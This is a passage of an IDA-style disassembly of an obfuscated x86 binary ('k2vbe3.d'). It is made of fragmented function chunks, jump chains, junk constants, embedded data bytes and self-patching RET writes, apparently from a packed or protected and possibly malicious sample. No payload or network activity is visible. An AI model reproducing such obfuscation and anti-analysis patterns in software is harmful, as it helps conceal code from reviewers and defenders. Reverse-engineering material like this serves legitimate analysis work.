		xchg	edx, [esp]
		jmp	loc_4402B7

; =============== S U B	R O U T	I N E =======================================



sub_43C779	proc near		; CODE XREF: sub_43D074+7p
					; k2vbe3.d:0044BA65j
		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [ebp-14h]
sub_43C779	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_43C780:				; CODE XREF: sub_455C7A+4CF4j
		mov	eax, [eax+60h]
		jmp	loc_4553F7	; CODE XREF: k2vbe3.d:loc_43C7F9j
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_43C788:				; CODE XREF: sub_451EEA+6330j
		xchg	eax, esi
		ror	ebx, 16h
		jmp	loc_44AF81
; END OF FUNCTION CHUNK	FOR sub_451EEA
; ---------------------------------------------------------------------------
		dw 0C6D9h
		dd 0CF4132EFh
dword_43C798	dd 0F9C59BDDh		; DATA XREF: k2vbe3.d:00442FA6w
					; sub_43C927+1D910r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_43C79C:				; CODE XREF: sub_454E69+3890j
		jmp	loc_459CE0
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
		db 8Ch,	0Bh, 4Ch
dword_43C7A4	dd 7E736A37h		; DATA XREF: sub_44945C+7r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_43C7A8:				; CODE XREF: sub_44E0F6+Dj
		jmp	loc_453C6C
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
		db 2Eh,	9Bh, 0F4h
; ---------------------------------------------------------------------------

loc_43C7B0:				; DATA XREF: k2vbe3.d:0044499Bw
		jle	short loc_43C7F9
		add	al, 7Fh
; START	OF FUNCTION CHUNK FOR sub_43CF52

loc_43C7B4:				; CODE XREF: sub_43CF52+E677j
		jmp	loc_4597D2
; END OF FUNCTION CHUNK	FOR sub_43CF52

; =============== S U B	R O U T	I N E =======================================



sub_43C7B9	proc near		; CODE XREF: sub_454FA8-44B6j

var_4		= dword	ptr -4

		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		ror	eax, 15h
		call	sub_444B65
sub_43C7B9	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_447692

loc_43C7C7:				; CODE XREF: sub_447692:loc_43D4FBj
		mov	eax, ds:dword_44F64C
		or	eax, eax
		jnz	loc_44DAEE
		jmp	loc_452F47
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4517D6

loc_43C7DA:				; CODE XREF: sub_4517D6:loc_45B1E4j
		mov	eax, 1
		jmp	loc_45126B
; END OF FUNCTION CHUNK	FOR sub_4517D6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
		db 5, 0E4h, 0C7h
		dd 0C60043h, 83840FC3h,	0E8000169h, 6ED6h
		db 0BAh
; ---------------------------------------------------------------------------

loc_43C7F9:				; CODE XREF: k2vbe3.d:loc_43C7B0j
		jo	short near ptr loc_43C783+2
		das
		mov	ds:135A5E9h, al
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E3FD

loc_43C802:				; CODE XREF: sub_43E3FD+7j
		rol	edi, 1Fh
		cmp	edi, 1F6ABB68h
		jmp	loc_4595ED
; END OF FUNCTION CHUNK	FOR sub_43E3FD
; ---------------------------------------------------------------------------
dword_43C810	dd 77E60000h		; DATA XREF: sub_4553CC:loc_4553D2r
					; k2vbe3.d:0045A7DAw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4469E1

loc_43C814:				; CODE XREF: sub_4469E1+9j
		jmp	loc_43C0B0
; END OF FUNCTION CHUNK	FOR sub_4469E1
; ---------------------------------------------------------------------------
aBoacqdrqFf6	db 'BŽí–Q¤rQ&fF\ÈØ6',0  ; DATA XREF: k2vbe3.d:loc_44C4DCo
					; sub_4553CC-310o
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E6D4

loc_43C829:				; CODE XREF: sub_43E6D4+5j
		jmp	nullsub_466
; END OF FUNCTION CHUNK	FOR sub_43E6D4

; =============== S U B	R O U T	I N E =======================================



sub_43C82E	proc near		; CODE XREF: k2vbe3.d:0043C502p
					; sub_4499EC-CFBCp ...

; FUNCTION CHUNK AT 0043C759 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E1FE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043E217 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F31C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442484 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004476C1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00448665 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448DAC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D8A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D9FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E43C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E527 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00451EAD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454822 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456486 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004593A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A678 SIZE 00000005 BYTES

		jnz	loc_442484
		push	0EC09B8B8h
		pop	edx
		and	edx, 95E6FD53h
		rol	edx, 1Bh
		jmp	loc_44E527
sub_43C82E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_43C848:				; CODE XREF: sub_441172:loc_43CF7Ej
		jge	loc_45A750
		push	ebx
		mov	edi, 5DAF5C77h
		jns	loc_444DB2
		add	esi, 1121A6A9h
		jmp	loc_45A750
; END OF FUNCTION CHUNK	FOR sub_441172

; =============== S U B	R O U T	I N E =======================================



sub_43C865	proc near		; CODE XREF: k2vbe3.d:00444E39j
					; sub_454AD4:loc_45493Cp

; FUNCTION CHUNK AT 00440A9B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044503A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00447829 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448660 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455AE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045751D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458D2E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C308 SIZE 0000000D BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44503F
		jmp	loc_455AE0
sub_43C865	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jg	loc_45B2E2
		jmp	loc_44FA27
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45649E

loc_43C885:				; CODE XREF: sub_44A1B1+471j
					; sub_45649E+8j
		mov	edx, [ebp+8]
		mov	edx, [edx-8]
		or	edx, 40h
		call	sub_441BF4

loc_43C893:				; CODE XREF: k2vbe3.d:004540CDj
		jmp	loc_45343D
; END OF FUNCTION CHUNK	FOR sub_45649E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A634

loc_43C898:				; CODE XREF: sub_45A634-10221j
		cdq
		jmp	loc_43CE6C
; END OF FUNCTION CHUNK	FOR sub_45A634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_43C89E:				; CODE XREF: sub_4423D2:loc_452B30j
		jz	loc_44002D
		jmp	loc_452563
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_43C8A9:				; CODE XREF: sub_43D823+16DE3j
		jz	loc_44462D
		jmp	loc_44D7F2
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43C8B4:				; CODE XREF: sub_45A323+113j
		jnz	loc_43DC12
		jmp	loc_45B30F
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45485B

loc_43C8BF:				; CODE XREF: sub_45485B-9459j
		xchg	ecx, [esp+4+var_4]
		push	4DEA6DA4h
		pop	edi
		or	edi, 0CBB4DD95h
		add	edi, 3042E2E3h
		mov	[edi], eax
		pop	edi
		push	offset loc_447656
		jmp	nullsub_163
; END OF FUNCTION CHUNK	FOR sub_45485B
; ---------------------------------------------------------------------------

loc_43C8E1:				; CODE XREF: k2vbe3.d:00444C3Fj
		xor	eax, ebx
		xchg	edx, [esp]
		mov	ebx, edx
		pop	edx
		mov	edx, [esp]
		jmp	loc_44E759
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449067

loc_43C8F1:				; CODE XREF: sub_449067:loc_43EBE7j
		add	esi, 82699C86h
		xchg	esi, [esp+4+var_4]
		jmp	loc_4460E0
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
		push	0EE4A2DB4h
		pop	eax
		add	eax, 45906626h
		xor	eax, 0ED60D4D0h
		jmp	loc_440A74

; =============== S U B	R O U T	I N E =======================================



sub_43C916	proc near		; CODE XREF: sub_44BA05:loc_44E1C2j

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		call	sub_43C927
		retn
sub_43C916	endp

; ---------------------------------------------------------------------------

loc_43C922:				; CODE XREF: k2vbe3.d:0043D359j
		jmp	loc_446D57

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43C927	proc near		; CODE XREF: sub_43C916+6p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00442FAD SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044468F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045359E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045637F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A22A SIZE 00000018 BYTES

		push	ebp
		mov	ebp, esp
		push	edx
		jmp	loc_45A22A
sub_43C927	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508AF

loc_43C930:				; CODE XREF: sub_4508AF:loc_4508C0j
		call	sub_4481DC

loc_43C935:				; CODE XREF: sub_453533+6j
		jmp	loc_44F495
; END OF FUNCTION CHUNK	FOR sub_4508AF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_523. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		xchg	eax, ebp
		jmp	sub_4445E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_43C942:				; CODE XREF: sub_45B74D:loc_450F19j
		mov	edx, [ebp-8]
		mov	eax, [ebp-4]
		call	sub_44B684
		mov	edx, [ebp-8]
		jmp	loc_4405CF
; END OF FUNCTION CHUNK	FOR sub_45B74D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_161. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_43C956:				; CODE XREF: sub_43CCD0+1352Aj
		jmp	nullsub_354
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_181. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445159

loc_43C95C:				; CODE XREF: sub_445159+9j
		jmp	loc_440059
; END OF FUNCTION CHUNK	FOR sub_445159
; ---------------------------------------------------------------------------

loc_43C961:				; CODE XREF: k2vbe3.d:0044A111j
		xchg	edi, [esp]
		mov	eax, edi
		pop	edi
		rol	eax, 6
		jnb	loc_450E94

loc_43C970:				; CODE XREF: k2vbe3.d:0044DDB8j
		jmp	sub_4597AE
; ---------------------------------------------------------------------------
		mov	edi, 64C266E2h
		jmp	loc_44C868
; ---------------------------------------------------------------------------
		mov	eax, 0F074E076h
		push	ebx
		push	0B1810578h
		pop	ebx
		sub	ebx, ds:4000EAh
		add	ebx, 0AA9A3F2Ch
		xchg	ebx, [esp]
		jmp	sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_43C99F:				; CODE XREF: sub_43DFE1:loc_44A35Fj
					; k2vbe3.d:0044A37Bj
		add	eax, 4EB12821h
		rol	eax, 1Ah
		xor	eax, 8F139B42h
		call	sub_4553CC
		xor	eax, 0DC5CC9F6h
		rol	eax, 0Fh
		jmp	loc_4498E6
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_43C9C1:				; CODE XREF: sub_4506C3j
		call	sub_442C22
; END OF FUNCTION CHUNK	FOR sub_4506C3
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_43C9C6:				; CODE XREF: sub_457DCA+Dj
		jmp	loc_455F89
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454F9F

loc_43C9CB:				; CODE XREF: sub_454F9F-57E5j
		jmp	loc_45C202
; END OF FUNCTION CHUNK	FOR sub_454F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_43C9D0:				; CODE XREF: sub_446CE6+3FE1j
		jmp	loc_449D1F
; END OF FUNCTION CHUNK	FOR sub_446CE6
; ---------------------------------------------------------------------------
		mov	ds:off_41E208, eax
		lea	eax, sub_441409
		mov	byte ptr [eax],	0C3h
		jmp	loc_458CF7

; =============== S U B	R O U T	I N E =======================================



sub_43C9E9	proc near		; CODE XREF: sub_417BB2+39p
					; k2vbe3.d:00453C2Ej
					; DATA XREF: ...

; FUNCTION CHUNK AT 0045C2E0 SIZE 0000001D BYTES

		push	esi
		jmp	loc_45C2E0
sub_43C9E9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_43C9EF:				; CODE XREF: sub_44DF16+411j
		adc	esi, 4AB12C3Eh
		jmp	loc_43E55C
; END OF FUNCTION CHUNK	FOR sub_44DF16
; ---------------------------------------------------------------------------

locret_43C9FA:				; CODE XREF: k2vbe3.d:0043D971j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_43C9FB:				; CODE XREF: sub_45512F+534j
		jmp	loc_4461E1
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_43CA00:				; CODE XREF: sub_457D4B:loc_4521C0j
		jmp	loc_442E2B
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451719

loc_43CA05:				; CODE XREF: sub_451719+Bj
		jmp	loc_457DAB
; END OF FUNCTION CHUNK	FOR sub_451719
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E39

loc_43CA0A:				; CODE XREF: sub_441E39+Ej
		jmp	loc_44B379
; END OF FUNCTION CHUNK	FOR sub_441E39
; ---------------------------------------------------------------------------

loc_43CA0F:				; CODE XREF: k2vbe3.d:0045BBFFj
		jnz	loc_4521A9
		jmp	loc_44B354
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_43CA1A:				; CODE XREF: sub_4499EC:loc_4407EEj
		mov	byte ptr [eax],	0C3h
		jmp	loc_44F090
; ---------------------------------------------------------------------------

loc_43CA22:				; CODE XREF: sub_4499EC-8926j
		mov	eax, [esp+0]
		push	edx
		call	sub_4599AA
		mov	eax, 86B13FACh
		call	sub_43C82E
		jmp	loc_448C8D
; END OF FUNCTION CHUNK	FOR sub_4499EC
; ---------------------------------------------------------------------------

loc_43CA3A:				; CODE XREF: k2vbe3.d:loc_43FF0Bj
		pop	ecx
		and	ecx, 295B731Ah
		add	ecx, 0F740F0D5h
		xchg	ecx, [esp]
		jmp	sub_444615
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_43CA4F:				; CODE XREF: sub_456C15:loc_43C2DFj
					; k2vbe3.d:0043C2EFj
		add	eax, 0F9FB5190h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_448109
		jmp	loc_43DD49
; END OF FUNCTION CHUNK	FOR sub_456C15
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_60. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_43CA65:				; CODE XREF: sub_45482D+31CFj
		jmp	loc_456C35
; END OF FUNCTION CHUNK	FOR sub_45482D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDC9

loc_43CA6A:				; CODE XREF: sub_44CDC9+11j
		jmp	loc_459106
; END OF FUNCTION CHUNK	FOR sub_44CDC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_43CA6F:				; CODE XREF: sub_446258-340Dj
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_446258
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_435. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43CA75:				; CODE XREF: k2vbe3.d:0044C1B2j
		jmp	locret_444836
; ---------------------------------------------------------------------------

loc_43CA7A:				; CODE XREF: k2vbe3.d:0043E3F8j
		jmp	sub_45AB7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449661

loc_43CA7F:				; CODE XREF: sub_449661:loc_441EFDj
		and	ecx, 227416DBh
		push	offset sub_4566F8
		jmp	loc_4595B7
; END OF FUNCTION CHUNK	FOR sub_449661
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_43CA8F:				; CODE XREF: sub_44A6BD:loc_447316j
		pop	ebx
		sub	ebx, 533103AAh
		test	ebx, 4000h
		jmp	loc_441572
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_44F98D
		jmp	loc_446C75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_43CAAE:				; CODE XREF: sub_43CCD0+98F9j
		xor	esi, ecx
		or	edx, esi
		jmp	loc_44922D
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_43CAB7:				; DATA XREF: sub_456666+11F5o
		jnz	loc_44F355
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		mov	eax, ds:dword_445648[eax*4]
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jz	loc_45668B
		jmp	loc_444CFB
; ---------------------------------------------------------------------------

loc_43CADC:				; CODE XREF: k2vbe3.d:004532F3j
		xchg	edx, [esp]
		pop	edx
		pop	edx
		js	loc_442AE0
		jmp	loc_44D44F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_43CAEC:				; CODE XREF: sub_44469A:loc_448F26j
		sbb	ebp, esi
		jmp	loc_440BA9
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544C3

loc_43CAF3:				; CODE XREF: sub_4544C3:loc_458B32j
		or	eax, eax
; END OF FUNCTION CHUNK	FOR sub_4544C3
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_43CAF5:				; CODE XREF: sub_44945C-6541j
		jnz	loc_448808
		jmp	loc_45A381
; END OF FUNCTION CHUNK	FOR sub_44945C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_432. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43CB01:				; CODE XREF: k2vbe3.d:0045947Aj
		jmp	loc_441597
; ---------------------------------------------------------------------------

loc_43CB06:				; CODE XREF: k2vbe3.d:00457758j
		jmp	loc_45195B
; ---------------------------------------------------------------------------

loc_43CB0B:				; CODE XREF: k2vbe3.d:0045533Ej
		jmp	loc_451AE3
; ---------------------------------------------------------------------------

loc_43CB10:				; CODE XREF: k2vbe3.d:00454156j
		jmp	loc_4574DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C1

loc_43CB15:				; CODE XREF: sub_45A4C1:loc_45000Aj
		jnz	loc_44FC5C
		jmp	loc_44CA0A
; END OF FUNCTION CHUNK	FOR sub_45A4C1
; ---------------------------------------------------------------------------

loc_43CB20:				; CODE XREF: k2vbe3.d:00442114j
		jz	loc_4564DD
		jmp	loc_454C2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_43CB2B:				; CODE XREF: sub_44945C-95D9j
		add	edx, 0CFD18A3Ah
		xor	edx, 1AB33C80h
		add	edx, 0A560EC40h
		xchg	edx, [esp+0]
		jmp	sub_4508A3
; END OF FUNCTION CHUNK	FOR sub_44945C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_43CB45:				; CODE XREF: sub_447692:loc_43F4D4j
		xor	eax, 0E2E9E19Eh
		push	offset sub_455500
		jmp	loc_44B50B
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_43CB55:				; CODE XREF: sub_4468FE:loc_43C4D2j
		add	eax, 6F01AA2Bh
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_43E27D
		jmp	loc_455590
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
		ja	loc_45C22B
		jmp	loc_45C230
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_43CB75:				; CODE XREF: sub_43FF90+3DFCj
		or	ecx, 3FFC5433h
		jp	loc_443230
		test	ebp, ebx

loc_43CB83:				; CODE XREF: k2vbe3.d:004527B7j
		jmp	loc_448E91
; END OF FUNCTION CHUNK	FOR sub_43FF90

; =============== S U B	R O U T	I N E =======================================



sub_43CB88	proc near		; DATA XREF: k2vbe3.d:00456079o
		xchg	eax, [esp+0]
		jmp	sub_4553CC
sub_43CB88	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_43CB90:				; CODE XREF: sub_4529E2+2186j
		mov	ecx, 242D117Eh
		jbe	loc_4407F3

loc_43CB9B:				; CODE XREF: sub_4529E2:loc_4437E5j
		lea	eax, [ebp-12Dh]
		push	edx
		mov	edx, eax
		xchg	edx, [esp+0]
		jmp	loc_456577
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_43CBAC:				; CODE XREF: sub_44660F:loc_4582F3j
		rol	ecx, 16h
		jmp	sub_443E73
; END OF FUNCTION CHUNK	FOR sub_44660F
; ---------------------------------------------------------------------------
		test	al, al
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_43CBB6:				; CODE XREF: sub_44921C:loc_453197j
		jz	locret_43C043
		jmp	loc_4535A9
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F174

loc_43CBC1:				; CODE XREF: sub_44F174:loc_440D4Bj
		test	edx, 4
		jmp	loc_455A20
; END OF FUNCTION CHUNK	FOR sub_44F174
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_43CBCC:				; CODE XREF: sub_44662B:loc_44AB21j
		rol	ecx, 7
		call	sub_44E34E

loc_43CBD4:				; CODE XREF: k2vbe3.d:0045A517j
		jmp	loc_45B878
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441A09

loc_43CBD9:				; CODE XREF: sub_441A09+14752j
		jmp	loc_44BE55
; END OF FUNCTION CHUNK	FOR sub_441A09
; ---------------------------------------------------------------------------

loc_43CBDE:				; CODE XREF: k2vbe3.d:004419DDj
		jmp	locret_43F38C
; ---------------------------------------------------------------------------

loc_43CBE3:				; CODE XREF: k2vbe3.d:0044187Ej
					; k2vbe3.d:00447293j
		jmp	loc_44DB33
; ---------------------------------------------------------------------------
		or	ebx, ecx
		jmp	loc_450CE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_43CBEF:				; CODE XREF: sub_447E07:loc_448702j
		pop	edx
		rol	eax, 8
		sub	eax, 540A3F51h
		xor	eax, 0FB13936Bh
		jmp	loc_4518EC
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------

loc_43CC04:				; CODE XREF: k2vbe3.d:loc_440A57j
		call	sub_4436CE
		push	45AAFDE5h
		xchg	eax, [esp]
		mov	edx, eax
		pop	eax
		and	edx, ds:4000E8h
		rol	edx, 9
		jb	loc_44AC4C
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43CC23:				; CODE XREF: sub_45A323+2Dj
		pushf
		jmp	loc_4512F7
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_43CC29:				; CODE XREF: sub_445124:loc_444ACCj
		mov	[edx], eax
		pop	edx
		lea	eax, sub_44C49B
		mov	byte ptr [eax],	0C3h
		jmp	sub_44C49B
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C49B

loc_43CC3A:				; CODE XREF: sub_44C49Bj
		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		jmp	loc_449497
; END OF FUNCTION CHUNK	FOR sub_44C49B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449A6E

loc_43CC45:				; CODE XREF: sub_449A6E+1Bj
		cmp	eax, 54FCF86Ch
		jmp	loc_449C20
; END OF FUNCTION CHUNK	FOR sub_449A6E
; ---------------------------------------------------------------------------

loc_43CC50:				; DATA XREF: sub_44FDAC+91DCo
		call	sub_44367E
		mov	eax, 0C7CC2482h
		push	offset loc_45B3C9
		jmp	loc_459ED7
; ---------------------------------------------------------------------------
		push	edx
		jmp	loc_44455D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442053

loc_43CC6A:				; CODE XREF: sub_442053+A0FBj
		and	eax, 0C0799AACh
		jmp	loc_4583FF
; END OF FUNCTION CHUNK	FOR sub_442053

; =============== S U B	R O U T	I N E =======================================



sub_43CC75	proc near		; CODE XREF: k2vbe3.d:004417DDj
					; sub_44945C:loc_448808p
		xchg	esi, [esp+0]
		pop	esi
		rol	eax, 0Eh
		push	esi
		mov	esi, eax
		xchg	esi, [esp+0]
		retn
sub_43CC75	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_43CC83:				; CODE XREF: sub_450983+Aj
		jmp	loc_443D34
; END OF FUNCTION CHUNK	FOR sub_450983
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_385. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43CC89	proc near		; CODE XREF: sub_44A679-AD9Ap
					; sub_443FC1+Cp ...
		jns	sub_4424CF
		push	ebp
		mov	ebp, esp
		push	ecx

loc_43CC93:				; CODE XREF: k2vbe3.d:0043E16Aj
		push	offset loc_45A2EF
		jmp	nullsub_23
sub_43CC89	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CDF

loc_43CC9D:				; CODE XREF: sub_456CDF-6F77j
		mov	eax, [ebp-30h]
; END OF FUNCTION CHUNK	FOR sub_456CDF
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_43CCA0:				; CODE XREF: sub_45512F:loc_43F59Bj
					; sub_45762D:loc_455824j
		push	eax
		call	sub_455BEA
		test	eax, eax
		jnz	loc_44DFDB
		jmp	loc_45BA35
; END OF FUNCTION CHUNK	FOR sub_45512F

; =============== S U B	R O U T	I N E =======================================



sub_43CCB3	proc near		; CODE XREF: sub_45381B+1p
					; k2vbe3.d:00455A2Bj

; FUNCTION CHUNK AT 0043DDD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F445 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044B241 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		jmp	loc_44B241
sub_43CCB3	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_35. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43CCC8	proc near		; DATA XREF: k2vbe3.d:0045083Ao
		mov	byte ptr [eax],	0C3h
		jmp	sub_4440B5
sub_43CCC8	endp


; =============== S U B	R O U T	I N E =======================================



sub_43CCD0	proc near		; CODE XREF: sub_41A465+19p
					; k2vbe3.d:004552DCj
					; DATA XREF: ...

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

